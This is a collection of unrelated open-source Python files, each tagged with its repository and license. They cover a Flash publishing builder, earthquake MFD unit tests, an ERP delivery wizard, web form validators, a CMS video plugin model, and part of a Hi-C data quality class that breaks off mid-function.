jsfl_list.append(jsfl)
self.is_initialized == True
return jsfl_list
def check_existence(self, tactic_node_name):
''' check if this node exist '''
pass
def load_file(self, path, node_name):
self.app.load(path, node_name)
def import_file(self, node_name, path, instantiation='import', use_namespace=True):
self.app.import_file( node_name, path, instantiation, load_mode='merge',use_namespace=True)
#self.render()
# initialize the session
load_mode="merge"
#load_mode="simple"
prefix_mode = ""
jsfl = self.app.get_jsfl(self.load_jsfl, "init_session", load_mode, prefix_mode,\
self.log_path, self.sandbox_path)
jsfl_list.append(jsfl)
def publish_file(self, asset_code, node_name):
# for flash asset code is node name
jsfl_list = self.init()
jsfl = self.app.get_jsfl(self.publish_jsfl, "publish_asset", asset_code,\
self.publish_dir, self.log_path)
jsfl_list.append(jsfl)
# execute all of the jsfl commands
jsfl_final = "\n".join(jsfl_list)
print(jsfl_final)
self.app.run_jsfl(jsfl_final)
def close_files(self):
self.app.close_files()
def render(self):
jsfl_list = self.init()
tmp_dir = self.env.get_tmp_dir()
# render
file_format = "png"
render_dir = "%s/render" % tmp_dir
prefix = ""
jsfl = self.app.get_jsfl(self.render_jsfl, "render_layer", prefix, file_format, render_dir, self.log_path)
jsfl_list.append(jsfl)
jsfl_final = "\n".join(jsfl_list)
print("jsfl_final: ", jsfl_final)
self.app.run_jsfl(jsfl_final)
| Southpaw-TACTIC/TACTIC | src/pyasm/application/flash/flash_builder.py | Python | epl-1.0 | 3,514 |
# The Hazard Library
# Copyright (C) 2012-2022 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.mfd import EvenlyDiscretizedMFD
from openquake.hazardlib.tests.mfd.base_test import BaseMFDTestCase
class EvenlyDiscretizedMFDMFDConstraintsTestCase(BaseMFDTestCase):
def test_empty_occurrence_rates(self):
exc = self.assert_mfd_error(
EvenlyDiscretizedMFD,
min_mag=1, bin_width=2, occurrence_rates=[]
)
self.assertEqual(str(exc), 'at least one bin must be specified')
def test_negative_occurrence_rate(self):
exc = self.assert_mfd_error(
EvenlyDiscretizedMFD,
min_mag=1, bin_width=2, occurrence_rates=[-0.1, 1]
)
self.assertEqual(str(exc), 'all occurrence rates '
'must not be negative')
def test_all_zero_occurrence_rates(self):
exc = self.assert_mfd_error(
EvenlyDiscretizedMFD,
min_mag=1, bin_width=2, occurrence_rates=[0, 0]
)
self.assertEqual(str(exc), 'at least one occurrence rate '
'must be positive')
def test_negative_minimum_magnitude(self):
exc = self.assert_mfd_error(
EvenlyDiscretizedMFD,
min_mag=-1, bin_width=2, occurrence_rates=[0.1, 1]
)
self.assertEqual(str(exc), 'minimum magnitude must be non-negative')
def test_negative_bin_width(self):
exc = self.assert_mfd_error(
EvenlyDiscretizedMFD,
min_mag=1, bin_width=-2, occurrence_rates=[0.1, 1]
)
self.assertEqual(str(exc), 'bin width must be positive')
class EvenlyDiscretizedMFDTestCase(BaseMFDTestCase):
def test_zero_min_mag(self):
mfd = EvenlyDiscretizedMFD(min_mag=0, bin_width=1,
occurrence_rates=[1])
self.assertEqual(mfd.get_annual_occurrence_rates(), [(0, 1)])
self.assertEqual(mfd.get_min_max_mag(), (0, 0))
def test_zero_rate(self):
evenly_discretized = EvenlyDiscretizedMFD(
min_mag=1, bin_width=2, occurrence_rates=[4, 0, 5]
)
self.assertEqual(evenly_discretized.get_annual_occurrence_rates(),
[(1, 4), (3, 0), (5, 5)])
def test(self):
evenly_discretized = EvenlyDiscretizedMFD(
min_mag=0.2, bin_width=0.3, occurrence_rates=[2.1, 2.4, 5.3]
)
self.assertEqual(evenly_discretized.get_annual_occurrence_rates(),
[(0.2, 2.1), (0.5, 2.4), (0.8, 5.3)])
self.assertEqual(evenly_discretized.get_min_max_mag(), (0.2, 0.8))
class EvenlyDiscretizedMFDTestCase(BaseMFDTestCase):
def test_modify_mfd(self):
mfd = EvenlyDiscretizedMFD(min_mag=4.0, bin_width=0.1,
occurrence_rates=[1, 2, 3])
mfd.modify(
"set_mfd",
{"min_mag": 4.5, "bin_width": 0.2, "occurrence_rates": [4, 5, 6]})
self.assertAlmostEqual(mfd.min_mag, 4.5)
self.assertAlmostEqual(mfd.bin_width, 0.2)
self.assertListEqual(mfd.occurrence_rates, [4, 5, 6])
def test_modify_mfd_constraints(self):
mfd = EvenlyDiscretizedMFD(min_mag=4.0, bin_width=0.1,
occurrence_rates=[1, 2, 3])
exc = self.assert_mfd_error(
mfd.modify,
"set_mfd",
{"min_mag": 4.0, "bin_width": 0.1, "occurrence_rates": [-1, 2, 3]})
self.assertEqual(str(exc), 'all occurrence rates must not be negative')
| gem/oq-engine | openquake/hazardlib/tests/mfd/evenly_discretized_test.py | Python | agpl-3.0 | 4,199 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2010-2012 Elico Corp. All Rights Reserved.
# Author: Yannick Gouin <yannick.gouin@elico-corp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv, fields
class arrange_time(osv.osv_memory):
_name = 'arrange.time'
_columns = {
'dts_id' : fields.many2one('delivery.time', 'Time', required=True, domain=[('type', '=', 'dts')]),
}
def confirm_add(self, cr, uid, ids, context=None):
data = self.browse(cr, uid, ids)[0]
picking_ids = context['active_ids']
picking_obj = self.pool.get('stock.picking')
line_obj = self.pool.get('delivery.route.line')
#TODO give warning to limit the rewrite!!
picking_obj.write(cr, uid, picking_ids, {'dts_id':data.dts_id.id})
for picking_id in picking_ids:
line_obj.create(cr, uid, {'picking_id':picking_id}, context=context)
return {
'type': 'ir.actions.act_window_close',
}
arrange_time()
| jmesteve/openerp | openerp/addons/delivery_routes/wizard/stock.py | Python | agpl-3.0 | 1,876 |
# This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
from datetime import timedelta
from wtforms.validators import StopValidation, ValidationError, EqualTo, Regexp
from indico.util.date_time import as_utc, format_datetime, format_time, now_utc, format_human_timedelta
from indico.util.i18n import _, ngettext
from indico.util.string import is_valid_mail
class UsedIf(object):
"""Makes a WTF field "used" if a given condition evaluates to True.
If the field is not used, validation stops.
"""
field_flags = ('conditional',)
def __init__(self, condition):
self.condition = condition
def __call__(self, form, field):
if self.condition in (True, False):
if not self.condition:
field.errors[:] = []
raise StopValidation()
elif not self.condition(form, field):
field.errors[:] = []
raise StopValidation()
class HiddenUnless(object):
"""Hides and disables a field unless another field has a certain value.
:param field: The name of the other field to check
:param value: The value to check for. If unspecified, any truthy
value is accepted.
:param preserve_data: If True, a disabled field will keep whatever
``object_data`` it had before (i.e. data set
via `FormDefaults`).
"""
field_flags = ('initially_hidden',)
def __init__(self, field, value=None, preserve_data=False):
self.field = field
self.value = value
self.preserve_data = preserve_data
def __call__(self, form, field):
value = form[self.field].data
active = (value and self.value is None) or (value == self.value and self.value is not None)
if not active:
field.errors[:] = []
if field.raw_data:
raise ValidationError("Received data for disabled field")
if not self.preserve_data:
# Clear existing data and use field default empty value
field.data = None
field.process_formdata([])
else:
# Clear existing data (just in case) and use the existing data for the field
field.data = None
field.process_data(field.object_data)
raise StopValidation()
class Exclusive(object):
"""Makes a WTF field mutually exclusive with other fields.
If any of the given fields have a value, the validated field may not have one.
"""
def __init__(self, *fields):
self.fields = fields
def __call__(self, form, field):
if field.data is None:
return
if any(form[f].data is not None for f in self.fields):
field_names = sorted(unicode(form[f].label.text) for f in self.fields)
msg = ngettext(u'This field is mutually exclusive with another field: {}',
u'This field is mutually exclusive with other fields: {}',
len(field_names))
raise ValidationError(msg.format(u', '.join(field_names)))
class ConfirmPassword(EqualTo):
def __init__(self, fieldname):
super(ConfirmPassword, self).__init__(fieldname, message=_('The passwords do not match.'))
class IndicoEmail(object):
"""Validates one or more email addresses"""
def __init__(self, multi=False):
self.multi = multi
def __call__(self, form, field):
if field.data and not is_valid_mail(field.data, self.multi):
msg = _(u'Invalid email address list') if self.multi else _(u'Invalid email address')
raise ValidationError(msg)
class DateTimeRange(object):
"""Validates a datetime is within the specified boundaries"""
field_flags = ('datetime_range',)
def __init__(self, earliest='now', latest=None):
self.earliest = earliest
self.latest = latest
# set to true in get_earliest/get_latest if applicable
self.earliest_now = False
self.latest_now = False
def __call__(self, form, field):
if field.data is None:
return
field_dt = as_utc(field.data)
earliest_dt = self.get_earliest(form, field)
latest_dt = self.get_latest(form, field)
if field_dt != field.object_data:
if earliest_dt and field_dt < earliest_dt:
if self.earliest_now:
msg = _("'{}' can't be in the past ({})").format(field.label, field.timezone)
else:
dt = format_datetime(earliest_dt, timezone=field.timezone)
msg = _("'{}' can't be before {} ({})").format(field.label, dt, field.timezone)
raise ValidationError(msg)
if latest_dt and field_dt > latest_dt:
if self.latest_now:
msg = _("'{}' can't be in the future ({})").format(field.label, field.timezone)
else:
dt = format_datetime(latest_dt, timezone=field.timezone)
msg = _("'{}' can't be after {} ({})").format(field.label, dt, field.timezone)
raise ValidationError(msg)
def get_earliest(self, form, field):
earliest = self.earliest(form, field) if callable(self.earliest) else self.earliest
if earliest == 'now':
self.earliest_now = True
return now_utc().replace(second=0, microsecond=0)
return as_utc(earliest) if earliest else earliest
def get_latest(self, form, field):
latest = self.latest(form, field) if callable(self.latest) else self.latest
if latest == 'now':
self.latest_now = True
return now_utc().replace(second=59, microsecond=999)
return as_utc(latest) if latest else latest
class LinkedDateTime(object):
"""Validates a datetime field happens before or/and after another.
If both ``not_before`` and ``not_after`` are set to ``True``, both fields have to
be equal.
"""
field_flags = ('linked_datetime',)
def __init__(self, field, not_before=True, not_after=False, not_equal=False):
if not not_before and not not_after:
raise ValueError("Invalid validation")
self.not_before = not_before
self.not_after = not_after
self.not_equal = not_equal
self.linked_field = field
def __call__(self, form, field):
if field.data is None:
return
linked_field = form[self.linked_field]
if linked_field.data is None:
return
linked_field_dt = as_utc(linked_field.data)
field_dt = as_utc(field.data)
if self.not_before and field_dt < linked_field_dt:
raise ValidationError(_("{} can't be before than {}").format(field.label, linked_field.label))
if self.not_after and field_dt > linked_field_dt:
raise ValidationError(_("{} can't be after than {}").format(field.label, linked_field.label))
if self.not_equal and field_dt == linked_field_dt:
raise ValidationError(_("{} can't be equal to {}").format(field.label, linked_field.label))
def used_if_not_synced(form, field):
"""Validator to prevent validation error on synced inputs.
Synced inputs are disabled in the form and don't send any value.
In that case, we disable validation from the input.
"""
if field.short_name in form.synced_fields:
field.errors[:] = []
raise StopValidation()
class UsedIfChecked(UsedIf):
def __init__(self, field_name):
def _condition(form, field):
return form._fields.get(field_name).data
super(UsedIfChecked, self).__init__(_condition)
class MaxDuration(object):
"""Validates if TimeDeltaField value doesn't exceed `max_duration`"""
def __init__(self, max_duration=None, **kwargs):
assert max_duration or kwargs
assert max_duration is None or not kwargs
self.max_duration = max_duration if max_duration is not None else timedelta(**kwargs)
def __call__(self, form, field):
if field.data is not None and field.data > self.max_duration:
raise ValidationError(_('Duration cannot exceed {}').format(format_human_timedelta(self.max_duration)))
class TimeRange(object):
"""Validate the time lies within boundaries."""
def __init__(self, earliest=None, latest=None):
assert earliest is not None or latest is not None, "At least one of `earliest` or `latest` must be specified."
if earliest is not None and latest is not None:
assert earliest <= latest, "`earliest` cannot be later than `latest`."
self.earliest = earliest
self.latest = latest
def __call__(self, form, field):
def _format_time(value):
return format_time(value) if value else None
if self.earliest and field.data < self.earliest or self.latest and field.data > self.latest:
if self.earliest is not None and self.latest is not None:
message = _("Must be between {earliest} and {latest}.")
elif self.latest is None:
message = _("Must be later than {earliest}.")
else:
message = _("Must be earlier than {latest}.")
raise ValidationError(message.format(earliest=_format_time(self.earliest), latest=_format_time(self.latest)))
class WordCount(object):
"""Validates the word count of a string.
:param min: The minimum number of words in the string. If not
provided, the minimum word count will not be checked.
:param min: The maximum number of words in the string. If not
provided, the maximum word count will not be checked.
"""
def __init__(self, min=-1, max=-1):
assert min != -1 or max != -1, 'At least one of `min` or `max` must be specified.'
assert max == -1 or min <= max, '`min` cannot be more than `max`.'
self.min = min
self.max = max
def __call__(self, form, field):
count = len(re.findall(r'\w+', field.data)) if field.data else 0
if count < self.min or self.max != -1 and count > self.max:
if self.max == -1:
message = ngettext('Field must contain at least {min} word.',
'Field must contain at least {min} words.', self.min)
elif self.min == -1:
message = ngettext('Field cannot contain more than {max} word.',
'Field cannot contain more than {max} words.', self.max)
else:
message = _('Field must have between {min} and {max} words.')
raise ValidationError(message.format(min=self.min, max=self.max, length=count))
class IndicoRegexp(Regexp):
"""
Like the WTForms `Regexp` validator, but supports populating the
HTML5 `patttern` attribute (the regex may not use any non-standard
Python extensions such as named groups in this case).
"""
def __init__(self, *args, **kwargs):
self.client_side = kwargs.pop('client_side', True)
super(IndicoRegexp, self).__init__(*args, **kwargs)
| DavidAndreev/indico | indico/web/forms/validators.py | Python | gpl-3.0 | 11,906 |
import re
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin
from cms.plugins.video import settings
from os.path import basename
class Video(CMSPlugin):
# player settings
movie = models.FileField(_('movie file'), upload_to=CMSPlugin.get_media_path, help_text=_('use .flv file or h264 encoded video file'), blank=True, null=True)
movie_url = models.CharField(_('movie url'), max_length=255, help_text=_('vimeo or youtube video url. Example: http://www.youtube.com/watch?v=YFa59lK-kpo'), blank=True, null=True)
image = models.ImageField(_('image'), upload_to=CMSPlugin.get_media_path, help_text=_('preview image file'), null=True, blank=True)
width = models.PositiveSmallIntegerField(_('width'))
height = models.PositiveSmallIntegerField(_('height'))
auto_play = models.BooleanField(_('auto play'), default=settings.VIDEO_AUTOPLAY)
auto_hide = models.BooleanField(_('auto hide'), default=settings.VIDEO_AUTOHIDE)
fullscreen = models.BooleanField(_('fullscreen'), default=settings.VIDEO_FULLSCREEN)
loop = models.BooleanField(_('loop'), default=settings.VIDEO_LOOP)
# plugin settings
bgcolor = models.CharField(_('background color'), max_length=6, default=settings.VIDEO_BG_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
textcolor = models.CharField(_('text color'), max_length=6, default=settings.VIDEO_TEXT_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
seekbarcolor = models.CharField(_('seekbar color'), max_length=6, default=settings.VIDEO_SEEKBAR_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
seekbarbgcolor = models.CharField(_('seekbar bg color'), max_length=6, default=settings.VIDEO_SEEKBARBG_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
loadingbarcolor = models.CharField(_('loadingbar color'), max_length=6, default=settings.VIDEO_LOADINGBAR_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
buttonoutcolor = models.CharField(_('button out color'), max_length=6, default=settings.VIDEO_BUTTON_OUT_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
buttonovercolor = models.CharField(_('button over color'), max_length=6, default=settings.VIDEO_BUTTON_OVER_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
buttonhighlightcolor = models.CharField(_('button highlight color'), max_length=6, default=settings.VIDEO_BUTTON_HIGHLIGHT_COLOR, help_text=_('Hexadecimal, eg ff00cc'))
def __unicode__(self):
if self.movie:
name = self.movie.path
else:
name = self.movie_url
return u"%s" % basename(name)
def get_height(self):
return "%s" % (self.height)
def get_width(self):
return "%s" % (self.width)
def get_movie(self):
if self.movie:
return self.movie.url
else:
return self.movie_url
| dibaunaumh/tikal-corp-website | cms/plugins/video/models.py | Python | bsd-3-clause | 2,890 |
#!/usr/bin/env python
"""A class for determining HiC data quality."""
import os
import sys
from math import ceil, floor
import numpy
import h5py
from scipy.optimize import curve_fit
try:
from mpi4py import MPI
except:
pass
try:
from pyx import *
unit.set(defaultunit="cm")
text.set(mode="latex")
except:
pass
import libraries._quasar as _quasar
class Quasar(object):
"""This class performs subsampling and QuASAR transformations for calculating HiC quality.
.. note::
This class is also available as hifive.Quasar
When initialized, this class creates an h5dict in which to store all data associated with this object.
:param filename: The file name of the h5dict to store the QuASAR-transformed data in.
:type filename: str.
:param mode: The mode to open the h5dict with. This should be 'w' for creating or overwriting an h5dict with name given in filename.
:type mode: str.
:param silent: Indicates whether to print information about function execution for this object.
:type silent: bool.
:returns: :class:`Quasar` class object.
"""
def __init__(self, filename, mode='a', silent=False):
"""Create a :class:`Quasar` object."""
try:
self.comm = MPI.COMM_WORLD
self.rank = self.comm.Get_rank()
self.num_procs = self.comm.Get_size()
except:
self.comm = None
self.rank = 0
self.num_procs = 1
self.file = os.path.abspath(filename)
self.hic_fname = None
self.silent = silent
self.filetype = 'quasar'
self.strict_qcutoff = 0.05798399
self.loose_qcutoff = 0.04345137
self.strict_rcutoff = 0.85862067
self.loose_rcutoff = 0.80026913
if mode != "w":
self.load(mode)
else:
if self.rank == 0:
self.storage = h5py.File(self.file, 'w')
else:
self.storage = None
return None
def __getitem__(self, key):
"""Dictionary-like lookup."""
if key in self.__dict__:
return self.__dict__[key]
else:
return None
def __setitem__(self, key, value):
"""Dictionary-like value setting."""
self.__dict__[key] = value
return None
def save(self):
"""
Save analysis parameters to h5dict.
:returns: None
"""
if self.rank != 0:
return None
for key in self.__dict__.keys():
if key in ['file', 'storage', 'silent', 'comm', 'rank', 'num_procs']:
continue
elif self[key] is None:
continue
elif isinstance(self[key], numpy.ndarray):
if key in self.storage:
del self.storage[key]
self.storage.create_dataset(key, data=self[key])
elif isinstance(self[key], list):
if isinstance(self[key][0], numpy.ndarray):
for i in range(len(self[key])):
self.storage.create_dataset("%s.%s" % (key, chroms[i]), data=self[key][i])
elif not isinstance(self[key], dict):
self.storage.attrs[key] = self[key]
return None
def load(self, mode='a'):
"""
Load data from h5dict specified at object creation.
Any call of this function will overwrite current object data with values from the last :func:`save` call.
:param mode: The mode to open the h5dict with.
:type mode: str.
:returns: None
"""
if self.rank != 0:
self.storage = None
return None
self.storage = h5py.File(self.file, mode)
for key in self.storage.keys():
if key.split('.')[0] in ['valid', 'dist', 'corr']:
continue
self[key] = numpy.copy(self.storage[key])
for key in self.storage['/'].attrs.keys():
self[key] = self.storage['/'].attrs[key]
return None
def close(self):
"""
Close h5dict file.
:returns: None
"""
if self.rank == 0:
self.storage.close()
return None
def find_transformation(self, hic, chroms=[], resolutions=[1000000, 200000, 40000, 10000],
coverages=[0, 40000000, 20000000, 10000000, 5000000, 2000000, 1000000], seed=None):
"""
Find QuASAR transformation from the specified HiC project.
:param hic: The HiC project from which to calculate QuASAR transformations from. If this function has been previously called with a different HiC project, the current transformed matrices will be deleted prior to calculating new matrices.
:type hic: class:`HiC` class object.
:param chroms: A list of chromosome names to calculate transformed matrices from. If this is an empty list, all chromosomes from the HiC object will be used.
:type mode: list
:param resolutions: A list of binning resolutions to find transformed matrices for.
:type resolutions: list
:param coverages: A list of cis read counts to downsample to prior to finding transformed matrices. A value of 0 indicates to use all reads. Coverages are calculated across only chromosomes specified in the 'chroms' argument.
:type coverages: list
:param seed: An integer to use as the initialization value for the random number generator.
:returns: :class:`Quasar` class object.
"""
if self.rank == 0:
coverages = numpy.array(coverages, dtype=numpy.int64)
resolutions = numpy.array(resolutions, dtype=numpy.int64)
resolutions.sort()
hic_fname = hic.file
if self.hic_fname is not None and self.hic_fname != hic_fname:
for key in self.storage.keys():
if key.split('.')[0] in ['valid', 'dist', 'corr']:
del self.storage[key]
if 'chromosomes' in self.storage:
del self.storage['chromosomes']
self.hic_fname = hic_fname
if seed is not None:
RNG = numpy.random.RandomState(seed=seed)
else:
RNG = numpy.random.RandomState()
# load partition information
if 'binned' in hic.__dict__ and hic.binned is not None:
temp_mids = hic.fends['bins']['mid'][...]
chr_indices = hic.fends['bin_indices'][...]
else:
temp_mids = hic.fends['fends']['mid'][...]
chr_indices = hic.fends['chr_indices'][...]
# fill in chromosome list if empty. Otherwise check that all specified chromosomes exist.
if not isinstance(chroms, list) or len(chroms) == 0:
chroms = hic.fends['chromosomes'][...]
valid = numpy.ones(chroms.shape[0], dtype=numpy.bool)
for i in range(chroms.shape[0]):
if chr_indices[i + 1] - chr_indices[i] == 0:
valid[i] = False
elif hic.data['cis_indices'][chr_indices[i + 1]] - hic.data['cis_indices'][chr_indices[i]] == 0:
valid[i] = False
chroms = chroms[valid]
# Load raw counts
bounds = numpy.zeros((len(chroms), 2), numpy.int64)
for i, chrom in enumerate(chroms):
chrint = hic.chr2int[chrom]
bounds[i, 0] = hic.data['cis_indices'][chr_indices[chrint]]
bounds[i, 1] = hic.data['cis_indices'][chr_indices[chrint + 1]]
raw = numpy.zeros((numpy.sum(bounds[:, 1] - bounds[:, 0]), 3), dtype=numpy.int64)
indices = numpy.zeros(len(chroms) + 1, dtype=numpy.int64)
mids = {}
starts = numpy.zeros(len(chroms), dtype=numpy.int32)
for i, chrom in enumerate(chroms):
chrint = hic.chr2int[chrom]
indices[i + 1] = indices[i] + bounds[i, 1] - bounds[i, 0]
temp = hic.data['cis_data'][bounds[i, 0]:bounds[i, 1], :]
temp[:, :2] -= chr_indices[chrint]
raw[indices[i]:indices[i + 1], :] = temp
mids[chrom] = temp_mids[chr_indices[chrint]:chr_indices[chrint + 1]]
starts[i] = mids[chrom][0]
# only consider coverage levels that are less than or equal to the number of cis reads
coverages = coverages[numpy.where(numpy.sum(raw[:, 2]) >= coverages)]
coverages.sort()
if coverages[0] == 0:
coverages[:-1] = coverages[1:]
coverages[-1] = 0
store_coverages = numpy.copy(coverages)
total_reads = numpy.sum(raw[:, 2])
if coverages.shape[0] > 0 and coverages[-1] == 0:
coverages[-1] = total_reads
coverages = coverages[::-1]
else:
coverages = None
resolutions = None
if self.comm is not None:
coverages = self.comm.bcast(coverages, root=0)
resolutions = self.comm.bcast(resolutions, root=0)
chroms = self.comm.bcast(chroms, root=0)
if coverages.shape[0] == 0:
return None
if self.rank == 0:
# write arguements to h5dict
if 'chromosomes' in self.storage:
del self.storage['chromosomes']
self.storage.create_dataset(name='chromosomes', data=numpy.array(chroms))
if 'resolutions' in self.storage:
del self.storage['resolutions']
self.storage.create_dataset(name='resolutions', data=numpy.array(resolutions))
if 'coverages' in self.storage:
del self.storage['coverages']
self.storage.create_dataset(name='coverages', data=numpy.array(store_coverages))
if 'starts' in self.storage:
del self.storage['starts']
self.storage.create_dataset(name='starts', data=starts)
self.storage.attrs['total_reads'] = total_reads
# rebin data to highest resolution for faster processing
remapped = {}
new_mids = {}
new_indices = numpy.zeros(len(chroms) + 1, dtype=numpy.int64)
for i, chrom in enumerate(chroms):
start = (starts[i] / resolutions[0]) * resolutions[0]
stop = ((mids[chrom][-1] - 1) / resolutions[0] + 1) * resolutions[0]
N = (stop - start) / resolutions[0]
mapping = (mids[chrom] - start) / resolutions[0]
raw[indices[i]:indices[i + 1], 0] = mapping[raw[indices[i]:indices[i + 1], 0]]
raw[indices[i]:indices[i + 1], 1] = mapping[raw[indices[i]:indices[i + 1], 1]]
new_index = numpy.unique(raw[indices[i]:indices[i + 1], 0] * N + raw[indices[i]:indices[i + 1], 1])
index = numpy.searchsorted(new_index, raw[indices[i]:indices[i + 1], 0] * N +
raw[indices[i]:indices[i + 1], 1])
remapped[chrom] = numpy.zeros((new_index.shape[0], 3), dtype=numpy.int64)
remapped[chrom][:, 0] = new_index / N
remapped[chrom][:, 1] = new_index % N
remapped[chrom][:, 2] = numpy.bincount(index, weights=raw[indices[i]:indices[i + 1], 2])
new_indices[i + 1] = new_index.shape[0] + new_indices[i]
new_mids[chrom] = (start + resolutions[0] / 2 + numpy.arange(N) *
resolutions[0]).astype(numpy.int32)
indices = new_indices.astype(numpy.int64)
mids = new_mids
raw = numpy.zeros((indices[-1], 3), dtype=numpy.int64)
for i, chrom in enumerate(chroms):
raw[indices[i]:indices[i + 1], :] = remapped[chrom]
del remapped
# cycle through coverages
for c, cov in enumerate(coverages):
if self.rank == 0:
if not self.silent:
print >> sys.stderr, ("\r%s\rDownsampling to %i coverage") % (' ' * 120, cov),
raw, indices = self._downsample(raw, indices, cov, RNG)
# cycle through resolutions
for r, res in enumerate(resolutions):
# For each chromosome, normalize and find distance-corrected matrix
for h, chrom in enumerate(chroms):
if self.rank == 0:
if cov == total_reads:
key = '%s.0C.%iR' % (chrom, res)
else:
key = '%s.%iC.%iR' % (chrom, cov, res)
if 'valid.%s' % key in self.storage:
if self.comm is not None:
skip = self.comm.bcast(True, root=0)
continue
if not self.silent:
print >> sys.stderr, ("\r%s\rCoverage %i Resolution %i Chrom %s - Normalizing counts") % (
' ' * 120, cov, res, chrom),
norm, dist, valid_rows = self._normalize(chrom, raw[indices[h]:indices[h + 1]], mids[chrom], res)
if not self.silent:
print >> sys.stderr, ("\r%s\rCoverage %i Resolution %i - Correlating chrom %s") % (
' ' * 120, cov, res, chrom),
corrs = self._find_correlations(norm, valid_rows)
# write resulting matrices to hdf5 file
if not self.silent:
print >> sys.stderr, ("\r%s\rCoverage %i Resolution %i Chrom %s - Writing results") % (
' ' * 120, cov, res, chrom),
if corrs is None:
self.storage.attrs['%s.invalid' % (key)] = True
else:
self.storage.create_dataset(name="valid.%s" % (key), data=valid_rows)
self.storage.create_dataset(name="dist.%s" % (key), data=dist)
self.storage.create_dataset(name="corr.%s" % (key), data=corrs)
else:
skip = self.comm.bcast(None, root=0)
if skip:
continue
self._find_correlations()
if self.rank == 0 and not self.silent:
print >> sys.stderr, ("\r%s\r") % (' ' * 120),
return None
def find_quality_scores(self, chroms=[]):
"""
Find QuASAR quality scores across whole dataset.
:param chroms: A list of chromosome names to calculate quality scores for.
:type chroms: list
:returns: A structured numpy array with the fields 'chromosome', 'resolution', 'coverage', and 'score'.
"""
if self.rank > 0:
return None
if 'chromosomes' not in self.storage:
return None
if len(chroms) == 0:
chroms = self.storage['chromosomes'][...]
else:
chroms = numpy.intersect1d(self.storage['chromosomes'][...], numpy.array(chroms))
coverages = self.storage['coverages'][...]
tcoverages = numpy.copy(coverages)
if tcoverages[-1] == 0:
tcoverages[-1] = self.storage.attrs['total_reads']
resolutions = self.storage['resolutions'][...]
scores = numpy.zeros((resolutions.shape[0], coverages.shape[0], chroms.shape[0] + 1), dtype=numpy.float64)
scores.fill(numpy.nan)
for j, res in enumerate(resolutions):
for k, cov in enumerate(coverages):
temp = numpy.zeros(4, dtype=numpy.float64)
for i, chrom in enumerate(chroms):
key = '%s.%iC.%iR' % (chrom, cov, res)
if 'valid.%s' % key in self.storage:
valid_rows = self.storage['valid.%s' % key][...]
dists = (1 + self.storage['dist.%s' % key][...]) ** 0.5
corrs = self.storage['corr.%s' % key][...]
valid = numpy.zeros(corrs.shape, dtype=numpy.bool)
N, M = dists.shape
corrs = corrs[:, :M]
valid = numpy.zeros((N, M), dtype=numpy.int32)
for l in range(min(N - 1, M)):
P = N - l - 1
valid[:P, l] = valid_rows[(l + 1):] * valid_rows[:P]
valid[numpy.where((numpy.abs(dists) == numpy.inf) | (numpy.abs(corrs) == numpy.inf))] = 0
where = numpy.where(valid)
N = where[0].shape[0]
if N > 0:
trans = numpy.sum(corrs[where] * dists[where])
corrs = numpy.sum(corrs[where])
dists = numpy.sum(dists[where])
scores[j, k, i] = trans / dists - corrs / N
temp += [trans, dists, corrs, N]
scores[j, k, -1] = temp[0] / temp[1] - temp[2] / temp[3]
all_chroms = numpy.r_[chroms, numpy.array(['All'])]
results = numpy.zeros(scores.shape[0] * scores.shape[1] * scores.shape[2], dtype=numpy.dtype([
('chromosome', all_chroms.dtype), ('resolution', numpy.int64), ('coverage', numpy.int64), ('score', numpy.float64)]))
results['score'] = scores.ravel(order='C')
results['resolution'] = numpy.repeat(resolutions, scores.shape[1] * scores.shape[2])
results['coverage'] = numpy.tile(numpy.repeat(coverages, scores.shape[2]), scores.shape[0])
results['chromosome'] = numpy.tile(all_chroms, scores.shape[0] * scores.shape[1])
return results
def find_replicate_scores(self, replicate, chroms=[]):
"""
Find QuASAR replicate scores across whole dataset.
:param replicate: A class:`Quasar` object to calculate replicate scores with. If this function has been previously called with a different sample, the current transformed matrices will be deleted prior to calculating new matrices.
:type replicate: class:`Quasar` class object.
:param chroms: A list of chromosome names to calculate replicate scores for.
:type chroms: list
:returns: A structured numpy array with the fields 'resolution', 'coverage', and 'score'.
"""
if self.rank > 0:
return None
if 'chromosomes' not in self.storage or 'chromosomes' not in replicate.storage:
return None
if len(chroms) == 0:
chroms = numpy.intersect1d(self.storage['chromosomes'][...], replicate.storage['chromosomes'][...])
else:
chroms = numpy.intersect1d(self.storage['chromosomes'][...], numpy.array(chroms))
chroms = numpy.intersect1d(chroms, replicate.storage['chromosomes'][...])
resolutions = numpy.intersect1d(self.storage['resolutions'][...], replicate.storage['resolutions'][...])
